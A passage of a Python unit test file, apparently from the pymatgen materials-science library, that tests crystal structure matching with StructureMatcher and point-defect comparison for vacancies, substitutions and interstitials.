Structure.from_file(os.path.join(test_dir, fname)))\n sm = StructureMatcher(comparator=ElementComparator())\n groups = sm.group_structures(structures)\n for g in groups:\n formula = g[0].composition.reduced_formula\n if formula in [\"Li2O\", \"LiFePO4\"]:\n self.assertEqual(len(g), 2)\n else:\n self.assertEqual(len(g), 1)\n\n def test_left_handed_lattice(self):\n \"\"\"Ensure Left handed lattices are accepted\"\"\"\n sm = StructureMatcher()\n s = Structure.from_file(os.path.join(test_dir, \"Li3GaPCO7.json\"))\n self.assertTrue(sm.fit(s, s))\n\n def test_as_dict_and_from_dict(self):\n sm = StructureMatcher(ltol=0.1, stol=0.2, angle_tol=2,\n primitive_cell=False, scale=False,\n comparator=FrameworkComparator())\n d = sm.as_dict()\n sm2 = StructureMatcher.from_dict(d)\n self.assertEqual(sm2.as_dict(), d)\n\n def test_no_scaling(self):\n sm = StructureMatcher(ltol=0.1, stol=0.1, angle_tol=2,\n scale=False, comparator=ElementComparator())\n self.assertTrue(sm.fit(self.struct_list[0], self.struct_list[1]))\n\n self.assertTrue(sm.get_rms_dist(self.struct_list[0],\n self.struct_list[1])[0] < 0.0008)\n\n def test_supercell_fit(self):\n sm = StructureMatcher(attempt_supercell=False)\n s1 = Structure.from_file(os.path.join(test_dir, \"Al3F9.json\"))\n s2 = Structure.from_file(os.path.join(test_dir, \"Al3F9_distorted.json\"))\n\n self.assertFalse(sm.fit(s1, s2))\n\n sm = StructureMatcher(attempt_supercell=True)\n\n self.assertTrue(sm.fit(s1, s2))\n self.assertTrue(sm.fit(s2, s1))\n\n def test_get_lattices(self):\n sm = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=True, scale=True,\n attempt_supercell=False)\n l1 = Lattice.from_lengths_and_angles([1, 2.1, 1.9], [90, 89, 91])\n l2 = Lattice.from_lengths_and_angles([1.1, 2, 2], [89, 91, 90])\n s1 = Structure(l1, [], [])\n s2 = Structure(l2, [], [])\n\n lattices = list(sm._get_lattices(s=s1, target_lattice=s2.lattice))\n self.assertEqual(len(lattices), 16)\n\n l3 = Lattice.from_lengths_and_angles([1.1, 2, 20], [89, 91, 90])\n s3 = Structure(l3, [], [])\n\n lattices = list(sm._get_lattices(s=s1, target_lattice=s3.lattice))\n self.assertEqual(len(lattices), 0)\n\n def test_find_match1(self):\n sm = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=True, scale=True,\n attempt_supercell=False)\n l = Lattice.orthorhombic(1, 2, 3)\n s1 = Structure(l, ['Si', 'Si', 'Ag'],\n [[0, 0, 0.1], [0, 0, 0.2], [.7, .4, .5]])\n s2 = Structure(l, ['Si', 'Si', 'Ag'],\n [[0, 0.1, 0], [0, 0.1, -0.95], [.7, .5, .375]])\n\n s1, s2, fu, s1_supercell = sm._preprocess(s1, s2, False)\n match = sm._strict_match(s1, s2, fu, s1_supercell=True, use_rms=True,\n break_on_match=False)\n scale_matrix = match[2]\n s2.make_supercell(scale_matrix)\n fc = s2.frac_coords + match[3]\n fc -= np.round(fc)\n self.assertAlmostEqual(np.sum(fc), 0.9)\n self.assertAlmostEqual(np.sum(fc[:, :2]), 0.1)\n cart_dist = np.sum(match[1] * (l.volume / 3) ** (1 / 3))\n self.assertAlmostEqual(cart_dist, 0.15)\n\n def test_find_match2(self):\n sm = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=True, scale=True,\n attempt_supercell=False)\n l = Lattice.orthorhombic(1, 2, 3)\n s1 = Structure(l, ['Si', 'Si'], [[0, 0, 0.1], [0, 0, 0.2]])\n s2 = Structure(l, ['Si', 'Si'], [[0, 0.1, 0], [0, 0.1, -0.95]])\n\n s1, s2, fu, s1_supercell = sm._preprocess(s1, s2, False)\n\n match = sm._strict_match(s1, s2, fu, s1_supercell=False,\n use_rms=True, break_on_match=False)\n scale_matrix = match[2]\n s2.make_supercell(scale_matrix)\n s2.translate_sites(range(len(s2)), match[3])\n\n self.assertAlmostEqual(np.sum(s2.frac_coords) % 1, 0.3)\n self.assertAlmostEqual(np.sum(s2.frac_coords[:, :2]) % 1, 0)\n\n def test_supercell_subsets(self):\n sm = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=False, scale=True,\n attempt_supercell=True, allow_subset=True,\n supercell_size='volume')\n sm_no_s = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=False, scale=True,\n attempt_supercell=True, allow_subset=False,\n supercell_size='volume')\n l = Lattice.orthorhombic(1, 2, 3)\n s1 = Structure(l, ['Ag', 'Si', 'Si'],\n [[.7, .4, .5], [0, 0, 0.1], [0, 0, 0.2]])\n s1.make_supercell([2, 1, 1])\n s2 = Structure(l, ['Si', 'Si', 'Ag'],\n [[0, 0.1, -0.95], [0, 0.1, 0], [-.7, .5, .375]])\n\n shuffle = [0, 2, 1, 3, 4, 5]\n s1 = Structure.from_sites([s1[i] for i in shuffle])\n\n # test when s1 is exact supercell of s2\n result = sm.get_s2_like_s1(s1, s2)\n for a, b in zip(s1, result):\n self.assertTrue(a.distance(b) < 0.08)\n self.assertEqual(a.species, b.species)\n\n self.assertTrue(sm.fit(s1, s2))\n self.assertTrue(sm.fit(s2, s1))\n self.assertTrue(sm_no_s.fit(s1, s2))\n self.assertTrue(sm_no_s.fit(s2, s1))\n\n rms = (0.048604032430991401, 0.059527539448807391)\n self.assertTrue(np.allclose(sm.get_rms_dist(s1, s2), rms))\n self.assertTrue(np.allclose(sm.get_rms_dist(s2, s1), rms))\n\n # test when the supercell is a subset of s2\n subset_supercell = s1.copy()\n del subset_supercell[0]\n result = sm.get_s2_like_s1(subset_supercell, s2)\n self.assertEqual(len(result), 6)\n for a, b in zip(subset_supercell, result):\n self.assertTrue(a.distance(b) < 0.08)\n self.assertEqual(a.species, b.species)\n\n self.assertTrue(sm.fit(subset_supercell, s2))\n self.assertTrue(sm.fit(s2, subset_supercell))\n self.assertFalse(sm_no_s.fit(subset_supercell, s2))\n self.assertFalse(sm_no_s.fit(s2, subset_supercell))\n\n rms = (0.053243049896333279, 0.059527539448807336)\n self.assertTrue(np.allclose(sm.get_rms_dist(subset_supercell, s2), rms))\n self.assertTrue(np.allclose(sm.get_rms_dist(s2, subset_supercell), rms))\n\n # test when s2 (once made a supercell) is a subset of s1\n s2_missing_site = s2.copy()\n del s2_missing_site[1]\n result = sm.get_s2_like_s1(s1, s2_missing_site)\n for a, b in zip((s1[i] for i in (0, 2, 4, 5)), result):\n self.assertTrue(a.distance(b) < 0.08)\n self.assertEqual(a.species, b.species)\n\n self.assertTrue(sm.fit(s1, s2_missing_site))\n self.assertTrue(sm.fit(s2_missing_site, s1))\n self.assertFalse(sm_no_s.fit(s1, s2_missing_site))\n self.assertFalse(sm_no_s.fit(s2_missing_site, s1))\n\n rms = (0.029763769724403633, 0.029763769724403987)\n self.assertTrue(np.allclose(sm.get_rms_dist(s1, s2_missing_site), rms))\n self.assertTrue(np.allclose(sm.get_rms_dist(s2_missing_site, s1), rms))\n\n def test_get_s2_large_s2(self):\n sm = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=False, scale=False,\n attempt_supercell=True, allow_subset=False,\n supercell_size='volume')\n\n l = Lattice.orthorhombic(1, 2, 3)\n s1 = Structure(l, ['Ag', 'Si', 'Si'],\n [[.7, .4, .5], [0, 0, 0.1], [0, 0, 0.2]])\n\n l2 = Lattice.orthorhombic(1.01, 2.01, 3.01)\n s2 = Structure(l2, ['Si', 'Si', 'Ag'],\n [[0, 0.1, -0.95], [0, 0.1, 0], [-.7, .5, .375]])\n s2.make_supercell([[0, -1, 0], [1, 0, 0], [0, 0, 1]])\n\n result = sm.get_s2_like_s1(s1, s2)\n\n for x, y in zip(s1, result):\n self.assertLess(x.distance(y), 0.08)\n\n def test_get_mapping(self):\n sm = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=False, scale=True,\n attempt_supercell=False,\n allow_subset=True)\n l = Lattice.orthorhombic(1, 2, 3)\n s1 = Structure(l, ['Ag', 'Si', 'Si'],\n [[.7, .4, .5], [0, 0, 0.1], [0, 0, 0.2]])\n s1.make_supercell([2, 1, 1])\n s2 = Structure(l, ['Si', 'Si', 'Ag'],\n [[0, 0.1, -0.95], [0, 0.1, 0], [-.7, .5, .375]])\n\n shuffle = [2, 0, 1, 3, 5, 4]\n s1 = Structure.from_sites([s1[i] for i in shuffle])\n # test the mapping\n s2.make_supercell([2, 1, 1])\n # equal sizes\n for i, x in enumerate(sm.get_mapping(s1, s2)):\n self.assertEqual(s1[x].species,\n s2[i].species)\n\n del s1[0]\n # s1 is subset of s2\n for i, x in enumerate(sm.get_mapping(s2, s1)):\n self.assertEqual(s1[i].species,\n s2[x].species)\n # s2 is smaller than s1\n del s2[0]\n del s2[1]\n self.assertRaises(ValueError, sm.get_mapping, s2, s1)\n\n def test_get_supercell_matrix(self):\n sm = StructureMatcher(ltol=0.1, stol=0.3, angle_tol=2,\n primitive_cell=False, scale=True,\n attempt_supercell=True)\n\n l = Lattice.orthorhombic(1, 2, 3)\n\n s1 = Structure(l, ['Si', 'Si', 'Ag'],\n [[0, 0, 0.1], [0, 0, 0.2], [.7, .4, .5]])\n s1.make_supercell([2, 1, 1])\n s2 = Structure(l, ['Si', 'Si', 'Ag'],\n [[0, 0.1, 0], [0, 0.1, -0.95], [-.7, .5, .375]])\n result = sm.get_supercell_matrix(s1, s2)\n self.assertTrue((result == [[-2, 0, 0], [0, 1, 0], [0, 0, 1]]).all())\n\n s1 = Structure(l, ['Si', 'Si', 'Ag'],\n [[0, 0, 0.1], [0, 0, 0.2], [.7, .4, .5]])\n s1.make_supercell([[1, -1, 0], [0, 0, -1], [0, 1, 0]])\n\n s2 = Structure(l, ['Si', 'Si', 'Ag'],\n [[0, 0.1, 0], [0, 0.1, -0.95], [-.7, .5, .375]])\n result = sm.get_supercell_matrix(s1, s2)\n self.assertTrue((result == [[-1, -1, 0], [0, 0, -1], [0, 1, 0]]).all())\n\n # test when the supercell is a subset\n sm = StructureMatcher(ltol=0.1, stol=0.3, angle_tol=2,\n primitive_cell=False, scale=True,\n attempt_supercell=True, allow_subset=True)\n del s1[0]\n result = sm.get_supercell_matrix(s1, s2)\n self.assertTrue((result == [[-1, -1, 0], [0, 0, -1], [0, 1, 0]]).all())\n\n def test_subset(self):\n sm = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=False, scale=True,\n attempt_supercell=False,\n allow_subset=True)\n l = Lattice.orthorhombic(10, 20, 30)\n s1 = Structure(l, ['Si', 'Si', 'Ag'],\n [[0, 0, 0.1], [0, 0, 0.2], [.7, .4, .5]])\n s2 = Structure(l, ['Si', 'Ag'],\n [[0, 0.1, 0], [-.7, .5, .4]])\n result = sm.get_s2_like_s1(s1, s2)\n\n self.assertEqual(len(find_in_coord_list_pbc(result.frac_coords,\n [0, 0, 0.1])), 1)\n self.assertEqual(len(find_in_coord_list_pbc(result.frac_coords,\n [0.7, 0.4, 0.5])), 1)\n\n # test with fewer species in s2\n s1 = Structure(l, ['Si', 'Ag', 'Si'],\n [[0, 0, 0.1], [0, 0, 0.2], [.7, .4, .5]])\n s2 = Structure(l, ['Si', 'Si'],\n [[0, 0.1, 0], [-.7, .5, .4]])\n result = sm.get_s2_like_s1(s1, s2)\n mindists = np.min(s1.lattice.get_all_distances(\n s1.frac_coords, result.frac_coords), axis=0)\n self.assertLess(np.max(mindists), 1e-6)\n\n self.assertEqual(len(find_in_coord_list_pbc(result.frac_coords,\n [0, 0, 0.1])), 1)\n self.assertEqual(len(find_in_coord_list_pbc(result.frac_coords,\n [0.7, 0.4, 0.5])), 1)\n\n # test with not enough sites in s1\n # test with fewer species in s2\n s1 = Structure(l, ['Si', 'Ag', 'Cl'],\n [[0, 0, 0.1], [0, 0, 0.2], [.7, .4, .5]])\n s2 = Structure(l, ['Si', 'Si'],\n [[0, 0.1, 0], [-.7, .5, .4]])\n self.assertEqual(sm.get_s2_like_s1(s1, s2), None)\n\n def test_out_of_cell_s2_like_s1(self):\n l = Lattice.cubic(5)\n s1 = Structure(l, ['Si', 'Ag', 'Si'],\n [[0, 0, -0.02], [0, 0, 0.001], [.7, .4, .5]])\n s2 = Structure(l, ['Si', 'Ag', 'Si'],\n [[0, 0, 0.98], [0, 0, 0.99], [.7, .4, .5]])\n new_s2 = StructureMatcher(primitive_cell=False).get_s2_like_s1(s1, s2)\n dists = np.sum((s1.cart_coords - new_s2.cart_coords) ** 2,\n axis=-1) ** 0.5\n self.assertLess(np.max(dists), 0.1)\n\n def test_disordered_primitive_to_ordered_supercell(self):\n sm_atoms = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=False, scale=True,\n attempt_supercell=True,\n allow_subset=True,\n supercell_size='num_atoms',\n comparator=OrderDisorderElementComparator())\n sm_sites = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=False, scale=True,\n attempt_supercell=True,\n allow_subset=True,\n supercell_size='num_sites',\n comparator=OrderDisorderElementComparator())\n lp = Lattice.orthorhombic(10, 20, 30)\n pcoords = [[0, 0, 0],\n [0.5, 0.5, 0.5]]\n ls = Lattice.orthorhombic(20, 20, 30)\n scoords = [[0, 0, 0],\n [0.75, 0.5, 0.5]]\n prim = Structure(lp, [{'Na': 0.5}, {'Cl': 0.5}], pcoords)\n supercell = Structure(ls, ['Na', 'Cl'], scoords)\n supercell.make_supercell([[-1, 1, 0], [0, 1, 1], [1, 0, 0]])\n\n self.assertFalse(sm_sites.fit(prim, supercell))\n self.assertTrue(sm_atoms.fit(prim, supercell))\n\n self.assertRaises(ValueError, sm_atoms.get_s2_like_s1, prim, supercell)\n self.assertEqual(len(sm_atoms.get_s2_like_s1(supercell, prim)), 4)\n\n def test_ordered_primitive_to_disordered_supercell(self):\n sm_atoms = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=False, scale=True,\n attempt_supercell=True,\n allow_subset=True,\n supercell_size='num_atoms',\n comparator=OrderDisorderElementComparator())\n sm_sites = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=False, scale=True,\n attempt_supercell=True,\n allow_subset=True,\n supercell_size='num_sites',\n comparator=OrderDisorderElementComparator())\n lp = Lattice.orthorhombic(10, 20, 30)\n pcoords = [[0, 0, 0],\n [0.5, 0.5, 0.5]]\n ls = Lattice.orthorhombic(20, 20, 30)\n scoords = [[0, 0, 0],\n [0.5, 0, 0],\n [0.25, 0.5, 0.5],\n [0.75, 0.5, 0.5]]\n s1 = Structure(lp, ['Na', 'Cl'], pcoords)\n s2 = Structure(ls, [{'Na': 0.5}, {'Na': 0.5}, {'Cl': 0.5}, {'Cl': 0.5}],\n scoords)\n\n self.assertTrue(sm_sites.fit(s1, s2))\n self.assertFalse(sm_atoms.fit(s1, s2))\n\n def test_disordered_to_disordered(self):\n sm_atoms = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=False, scale=True,\n attempt_supercell=True,\n allow_subset=False,\n comparator=OrderDisorderElementComparator())\n lp = Lattice.orthorhombic(10, 20, 30)\n coords = [[0., 0., 0.], [0.5, 0.5, 0.5]]\n s1 = Structure(lp, [{'Na': 0.5, \"Cl\": 0.5}, {'Na': 0.5, \"Cl\": 0.5}],\n coords)\n s2 = Structure(lp, [{'Na': 0.5, \"Cl\": 0.5}, {'Na': 0.5, \"Br\": 0.5}],\n coords)\n\n self.assertFalse(sm_atoms.fit(s1, s2))\n\n def test_occupancy_comparator(self):\n\n lp = Lattice.orthorhombic(10, 20, 30)\n pcoords = [[0, 0, 0],\n [0.5, 0.5, 0.5]]\n s1 = Structure(lp, [{'Na': 0.6, 'K': 0.4}, 'Cl'], pcoords)\n s2 = Structure(lp, [{'Xa': 0.4, 'Xb': 0.6}, 'Cl'], pcoords)\n s3 = Structure(lp, [{'Xa': 0.5, 'Xb': 0.5}, 'Cl'], pcoords)\n\n sm_sites = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5,\n primitive_cell=False, scale=True,\n attempt_supercell=True,\n allow_subset=True,\n supercell_size='num_sites',\n comparator=OccupancyComparator())\n\n self.assertTrue(sm_sites.fit(s1, s2))\n self.assertFalse(sm_sites.fit(s1, s3))\n\n def test_electronegativity(self):\n sm = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5)\n\n s1 = Structure.from_file(os.path.join(test_dir, \"Na2Fe2PAsO4S4.json\"))\n s2 = Structure.from_file(os.path.join(test_dir, \"Na2Fe2PNO4Se4.json\"))\n self.assertEqual(\n sm.get_best_electronegativity_anonymous_mapping(s1, s2),\n {Element('S'): Element('Se'),\n Element('As'): Element('N'),\n Element('Fe'): Element('Fe'),\n Element('Na'): Element('Na'),\n Element('P'): Element('P'),\n Element('O'): Element('O'), })\n self.assertEqual(len(sm.get_all_anonymous_mappings(s1, s2)), 2)\n\n # test include_dist\n dists = {Element('N'): 0, Element('P'): 0.0010725064}\n for mapping, d in sm.get_all_anonymous_mappings(s1, s2,\n include_dist=True):\n self.assertAlmostEqual(dists[mapping[Element('As')]], d)\n\n def test_rms_vs_minimax(self):\n # This tests that structures with adjusted RMS less than stol, but minimax\n # greater than stol are treated properly\n # stol=0.3 gives exactly an ftol of 0.1 on the c axis\n sm = StructureMatcher(ltol=0.2, stol=0.301, angle_tol=1,\n primitive_cell=False)\n l = Lattice.orthorhombic(1, 2, 12)\n\n sp = [\"Si\", \"Si\", \"Al\"]\n s1 = Structure(l, sp, [[0.5, 0, 0], [0, 0, 0], [0, 0, 0.5]])\n s2 = Structure(l, sp, [[0.5, 0, 0], [0, 0, 0], [0, 0, 0.6]])\n self.assertArrayAlmostEqual(sm.get_rms_dist(s1, s2),\n (0.32 ** 0.5 / 2, 0.4))\n\n self.assertEqual(sm.fit(s1, s2), False)\n self.assertEqual(sm.fit_anonymous(s1, s2), False)\n self.assertEqual(sm.get_mapping(s1, s2), None)\n\n\nclass PointDefectComparatorTest(PymatgenTest):\n\n def test_defect_matching(self):\n # SETUP DEFECTS FOR TESTING\n # symmorphic defect test set\n s_struc = Structure.from_file(\n os.path.join(test_dir, \"CsSnI3.cif\")) # tetragonal CsSnI3\n identical_Cs_vacs = [Vacancy(s_struc, s_struc[0]),\n Vacancy(s_struc, s_struc[1])]\n identical_I_vacs_sublattice1 = [Vacancy(s_struc, s_struc[4]),\n Vacancy(s_struc, s_struc[5]),\n Vacancy(s_struc, s_struc[8]),\n Vacancy(s_struc,\n s_struc[9])] # in plane halides\n identical_I_vacs_sublattice2 = [Vacancy(s_struc, s_struc[6]),\n Vacancy(s_struc, s_struc[\n 7])] # out of plane halides\n pdc = PointDefectComparator()\n\n # NOW TEST DEFECTS\n # test vacancy matching\n self.assertTrue(pdc.are_equal(identical_Cs_vacs[0], identical_Cs_vacs[\n 0])) # trivial vacancy test\n self.assertTrue(pdc.are_equal(identical_Cs_vacs[0], identical_Cs_vacs[\n 1])) # vacancies on same sublattice\n for i, j in itertools.combinations(range(4), 2):\n self.assertTrue(pdc.are_equal(identical_I_vacs_sublattice1[i],\n identical_I_vacs_sublattice1[j]))\n self.assertTrue(pdc.are_equal(identical_I_vacs_sublattice2[0],\n identical_I_vacs_sublattice2[1]))\n self.assertFalse(pdc.are_equal(identical_Cs_vacs[0],\n # both vacancies, but different specie types\n identical_I_vacs_sublattice1[0]))\n self.assertFalse(pdc.are_equal(identical_I_vacs_sublattice1[0],\n # same specie type, different sublattice\n identical_I_vacs_sublattice2[0]))\n\n # test substitutional matching\n sub_Cs_on_I_sublattice1_set1 = PeriodicSite('Cs',\n identical_I_vacs_sublattice1[\n 0].site.frac_coords,\n s_struc.lattice)\n sub_Cs_on_I_sublattice1_set2 = PeriodicSite('Cs',\n identical_I_vacs_sublattice1[\n 1].site.frac_coords,\n s_struc.lattice)\n sub_Cs_on_I_sublattice2 = PeriodicSite('Cs',\n identical_I_vacs_sublattice2[\n 0].site.frac_coords,\n s_struc.lattice)\n sub_Rb_on_I_sublattice2 = PeriodicSite('Rb',\n identical_I_vacs_sublattice2[\n 0].site.frac_coords,\n s_struc.lattice)\n\n self.assertTrue(pdc.are_equal( # trivial substitution test\n Substitution(s_struc, sub_Cs_on_I_sublattice1_set1),\n Substitution(s_struc, sub_Cs_on_I_sublattice1_set1)\n ))\n\n self.assertTrue(pdc.are_equal( # same sublattice, different coords\n Substitution(s_struc, sub_Cs_on_I_sublattice1_set1),\n Substitution(s_struc, sub_Cs_on_I_sublattice1_set2)\n ))\n self.assertFalse(pdc.are_equal( # different subs (wrong specie)\n Substitution(s_struc, sub_Cs_on_I_sublattice2),\n Substitution(s_struc, sub_Rb_on_I_sublattice2)\n ))\n self.assertFalse(pdc.are_equal( # different subs (wrong sublattice)\n Substitution(s_struc, sub_Cs_on_I_sublattice1_set1),\n Substitution(s_struc, sub_Cs_on_I_sublattice2)\n ))\n\n # test symmorphic interstitial matching\n # (using set generated from Voronoi generator, with same sublattice given by saturatated_interstitial_structure function)\n inter_H_sublattice1_set1 = PeriodicSite('H', [0., 0.75, 0.25],\n s_struc.lattice)\n inter_H_sublattice1_set2 = PeriodicSite('H', [0., 0.75, 0.75],\n s_struc.lattice)\n inter_H_sublattice2 = PeriodicSite('H',\n [0.57796112, 0.06923687, 0.56923687],\n s_struc.lattice)\n inter_H_sublattice3 = PeriodicSite('H', [0.25, 0.25, 0.54018268],\n s_struc.lattice)\n inter_He_sublattice3 = PeriodicSite('He', [0.25, 0.25, 0.54018268],\n s_struc.lattice)\n\n self.assertTrue(pdc.are_equal( # trivial interstitial test\n Interstitial(s_struc, inter_H_sublattice1_set1),\n Interstitial(s_struc, inter_H_sublattice1_set1)\n ))\n\n self.assertTrue(pdc.are_equal( # same sublattice, different coords\n Interstitial(s_struc, inter_H_sublattice1_set1),\n Interstitial(s_struc, inter_H_sublattice1_set2)\n ))\n self.assertFalse(\n pdc.are_equal( # different interstitials (wrong sublattice)\n Interstitial(s_struc, inter_H_sublattice1_set1),\n Interstitial(s_struc, inter_H_sublattice2)\n ))\n self.assertFalse(\n pdc.are_equal( # different interstitials (wrong sublattice)\n Interstitial(s_struc, inter_H_sublattice1_set1),\n Interstitial(s_struc, inter_H_sublattice3)\n ))\n self.assertFalse(\n pdc.are_equal( # different interstitials (wrong specie)\n Interstitial(s_struc, inter_H_sublattice3),\n Interstitial(s_struc, inter_He_sublattice3)\n ))\n\n # test non-symmorphic interstitial matching\n # (using set generated from Voronoi generator, with same sublattice given by saturatated_interstitial_structure function)\n ns_struc = Structure.from_file(os.path.join(test_dir, \"CuCl.cif\"))\n ns_inter_H_sublattice1_set1 = PeriodicSite('H', [0.06924513, 0.06308959,\n 0.86766528],\n ns_struc.lattice)\n ns_inter_H_sublattice1_set2 = PeriodicSite('H', [0.43691041, 0.36766528,\n 0.06924513],\n ns_struc.lattice)\n ns_inter_H_sublattice2 = PeriodicSite('H', [0.06022109, 0.60196031,\n 0.1621814],\n ns_struc.lattice)\n ns_inter_He_sublattice2 = PeriodicSite('He', [0.06022109, 0.60196031,\n 0.1621814],\n ns_struc.lattice)\n\n self.assertTrue(pdc.are_equal( # trivial interstitial test\n Interstitial(ns_struc, ns_inter_H_sublattice1_set1),\n Interstitial(ns_struc, ns_inter_H_sublattice1_set1)\n ))\n self.assertTrue(pdc.are_equal( # same sublattice, different coords\n Interstitial(ns_struc, ns_inter_H_sublattice1_set1),\n Interstitial(ns_struc, ns_inter_H_sublattice1_set2)\n ))\n self.assertFalse(pdc.are_equal(\n Interstitial(ns_struc, ns_inter_H_sublattice1_set1),\n # different interstitials (wrong sublattice)\n Interstitial(ns_struc, ns_inter_H_sublattice2)))\n self.assertFalse(\n pdc.are_equal( # different interstitials (wrong specie)\n Interstitial(ns_struc, ns_inter_H_sublattice2),\n Interstitial(ns_struc, ns_inter_He_sublattice2)\n ))\n\n # test influence of charge on defect matching (default is to be charge agnostic)\n vac_diff_chg = identical_Cs_vacs[0].copy()\n vac_diff_chg.set_charge(3.)\n self.assertTrue(pdc.are_equal(identical_Cs_vacs[0], vac_diff_chg))\n chargecheck_pdc = PointDefectComparator(\n check_charge=True) # switch to PDC which cares about charge state\n self.assertFalse(\n chargecheck_pdc.are_equal(identical_Cs_vacs[0], vac_diff_chg))\n\n # test different supercell size\n # (comparing same defect but different supercells - default is to not check for this)\n sc_agnostic_pdc = PointDefectComparator(check_primitive_cell=True)\n sc_scaled_s_struc = s_struc.copy()\n sc_scaled_s_struc.make_supercell([2, 2, 3])\n sc_scaled_I_vac_sublatt1_ps1 = PeriodicSite('I',\n identical_I_vacs_sublattice1[\n 0].site.coords,\n sc_scaled_s_struc.lattice,\n coords_are_cartesian=True)\n sc_scaled_I_vac_sublatt1_ps2 = PeriodicSite('I',\n identical_I_vacs_sublattice1[\n 1].site.coords,\n sc_scaled_s_struc.lattice,\n coords_are_cartesian=True)\n sc_scaled_I_vac_sublatt2_ps = PeriodicSite('I',\n identical_I_vacs_sublattice2[\n 1].site.coords,\n sc_scaled_s_struc.lattice,\n coords_are_cartesian=True)\n sc_scaled_I_vac_sublatt1_defect1 = Vacancy(sc_scaled_s_struc,\n sc_scaled_I_vac_sublatt1_ps1)\n sc_scaled_I_vac_sublatt1_defect2 = Vacancy(sc_scaled_s_struc,\n sc_scaled_I_vac_sublatt1_ps2)\n sc_scaled_I_vac_sublatt2_defect = Vacancy(sc_scaled_s_struc,\n sc_scaled_I_vac_sublatt2_ps)\n\n self.assertFalse(\n pdc.are_equal(identical_I_vacs_sublattice1[0],\n # trivially same defect site but between different supercells\n sc_scaled_I_vac_sublatt1_defect1))\n self.assertTrue(\n sc_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[0],\n sc_scaled_I_vac_sublatt1_defect1))\n self.assertFalse(pdc.are_equal(identical_I_vacs_sublattice1[1],\n # same coords, different lattice structure\n sc_scaled_I_vac_sublatt1_defect1))\n self.assertTrue(\n sc_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[1],\n sc_scaled_I_vac_sublatt1_defect1))\n self.assertFalse(pdc.are_equal(identical_I_vacs_sublattice1[0],\n # same sublattice, different coords\n sc_scaled_I_vac_sublatt1_defect2))\n self.assertTrue(\n sc_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[0],\n sc_scaled_I_vac_sublatt1_defect2))\n self.assertFalse(\n sc_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[0],\n # different defects (wrong sublattice)\n sc_scaled_I_vac_sublatt2_defect))\n\n # test same structure size, but scaled lattice volume\n # (default is to not allow these to be equal, but check_lattice_scale=True allows for this)\n vol_agnostic_pdc = PointDefectComparator(check_lattice_scale=True)\n vol_scaled_s_struc = s_struc.copy()\n vol_scaled_s_struc.scale_lattice(s_struc.volume * 0.95)\n vol_scaled_I_vac_sublatt1_defect1 = Vacancy(vol_scaled_s_struc,\n vol_scaled_s_struc[4])\n vol_scaled_I_vac_sublatt1_defect2 = Vacancy(vol_scaled_s_struc,\n vol_scaled_s_struc[5])\n vol_scaled_I_vac_sublatt2_defect = Vacancy(vol_scaled_s_struc,\n vol_scaled_s_struc[6])\n\n self.assertFalse(pdc.are_equal(identical_I_vacs_sublattice1[0],\n # trivially same defect (but vol change)\n vol_scaled_I_vac_sublatt1_defect1))\n self.assertTrue(\n vol_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[0],\n vol_scaled_I_vac_sublatt1_defect1))\n self.assertFalse(\n pdc.are_equal(identical_I_vacs_sublattice1[0],\n # same defect, different sublattice point (and vol change)\n vol_scaled_I_vac_sublatt1_defect2))\n self.assertTrue(\n vol_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[0],\n vol_scaled_I_vac_sublatt1_defect2))\n self.assertFalse(\n vol_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[0],\n # different defect (wrong sublattice)\n vol_scaled_I_vac_sublatt2_defect))\n\n # test identical defect which has had entire lattice shifted\n shift_s_struc = s_struc.copy()\n shift_s_struc.translate_sites(range(len(s_struc)), [0.2, 0.3, 0.4],\n frac_coords=True, to_unit_cell=True)\n shifted_identical_Cs_vacs = [Vacancy(shift_s_struc, shift_s_struc[0]),\n Vacancy(shift_s_struc, shift_s_struc[1])]\n self.assertTrue(pdc.are_equal(identical_Cs_vacs[0],\n # trivially same defect (but shifted)\n shifted_identical_Cs_vacs[0]))\n self.assertTrue(pdc.are_equal(identical_Cs_vacs[0],\n # same defect on different sublattice point (and shifted)\n shifted_identical_Cs_vacs[1]))\n\n # test uniform lattice shift within non-symmorphic structure\n shift_ns_struc = ns_struc.copy()\n shift_ns_struc.translate_sites(range(len(ns_struc)), [0., 0.6, 0.3],\n frac_coords=True, to_unit_cell=True)\n\n shift_ns_inter_H_sublattice1_set1 = PeriodicSite('H',\n ns_inter_H_sublattice1_set1.frac_coords + [\n 0., 0.6, 0.3],\n shift_ns_struc.lattice)\n shift_ns_inter_H_sublattice1_set2 = PeriodicSite('H',\n ns_inter_H_sublattice1_set2.frac_coords + [\n 0., 0.6, 0.3],\n shift_ns_struc.lattice)\n self.assertTrue(\n pdc.are_equal(Interstitial(ns_struc, ns_inter_H_sublattice1_set1),\n # trivially same defect (but shifted)\n Interstitial(shift_ns_struc,\n shift_ns_inter_H_sublattice1_set1)))\n self.assertTrue(\n pdc.are_equal(Interstitial(ns_struc, ns_inter_H_sublattice1_set1),\n # same defect on different sublattice point (and shifted)\n Interstitial(shift_ns_struc,\n shift_ns_inter_H_sublattice1_set2)))\n\n # test a rotational + supercell type structure transformation (requires check_primitive_cell=True)\n rotated_s_struc = s_struc.copy()\n rotated_s_struc.make_supercell([[2, 1, 0], [-1, 3, 0], [0, 0, 2]])\n rotated_identical_Cs_vacs = 